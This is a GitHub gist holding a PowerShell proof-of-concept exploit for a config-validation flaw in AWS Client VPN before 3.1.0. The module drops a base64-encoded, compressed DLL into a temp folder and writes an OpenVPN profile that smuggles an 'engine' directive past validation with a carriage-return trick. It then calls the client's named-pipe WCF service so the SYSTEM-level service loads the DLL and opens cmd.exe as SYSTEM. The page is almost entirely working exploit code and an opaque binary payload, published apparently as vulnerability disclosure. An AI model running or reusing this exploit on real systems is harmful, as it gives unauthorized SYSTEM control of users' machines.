Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
AWS Client VPN < 3.1.0 OpenVPN config validation flaw can be used to escalate privileges (proof of concept)
<#
Usage:
Import-Module .\Invoke-ExploitAWSVPNLPE.psd1
Invoke-ExploitAWSVPNLPE
#>
@{
RootModule = 'Invoke-ExploitAWSVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '656e7aa1-797d-42c9-ac70-4d50378f5457'
Author = 'Yorick Koster'
CompanyName = 'Securify B.V.'
Copyright = '(c) Yorick Koster. All rights reserved.'
Description = 'AWS VPN Client exploit module to run cmd.exe with SYSTEM privileges'
RequiredAssemblies = @("System.ServiceModel",
"$env:ProgramFiles\Amazon\AWS VPN Client\AWSVPNClient.Core.dll",
"$env:ProgramFiles\Amazon\AWS VPN Client\AWSVPNClient.Service.exe")
FunctionsToExport = @("Invoke-ExploitAWSVPNLPE")
}
Function Invoke-ExploitAWSVPNLPE {
$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
New-Item -Type Directory -Path $tmpfolder | Out-Null
# create engine payload
# https://bugs.chromium.org/p/project-zero/issues/attachment?aid=226456&signed_aid=FXLb7IFsO5A2ZIlQ8sV8kA==
$EncodedCompressedFile = "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"
$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
$dll = New-Object byte[] 14336
$DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
$DeflatedStream.Close() | Out-Null
Set-Content -Path "$tmpfolder\foo.dll" -Encoding Byte $dll
# create config files
$timestamp = [ACVC.Core.Utils.DateUtils]::SecondsSinceEpoch() + 1000000000
Set-Content -Path "$tmpfolder\acvc-8096.txt" "password"
Set-Content -Path "$tmpfolder\lpe.ovpn" "dev tap
client
remote 127.0.0.1 1337
<ca>
</ca>
<cert>
</cert>
<key>
</key>
verb `r<cert>
engine $($tmpfolder.Replace('\', '\\'))\\foo
;</cert>"
Set-Content -Value "$tmpfolder\lpe.ovpn`n$timestamp" -Path "$tmpfolder\current_connection.txt"
# call WCF service
$binding = New-Object System.ServiceModel.NetNamedPipeBinding
$endpoint = "net.pipe://localhost/com.amazonaws.acvc.wpf/service"
$factory = New-Object System.ServiceModel.ChannelFactory[ACVC.WPF.Service.Wcf.IOvpnProcessRunner]($binding, $endpoint)
$client = $factory.CreateChannel()
$client.Start("$tmpfolder\current_connection.txt", "$tmpfolder\acvc-8096.txt")
$factory.Close()
# clean up
Start-Sleep 10
Remove-Item $tmpfolder -Force -Recurse
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment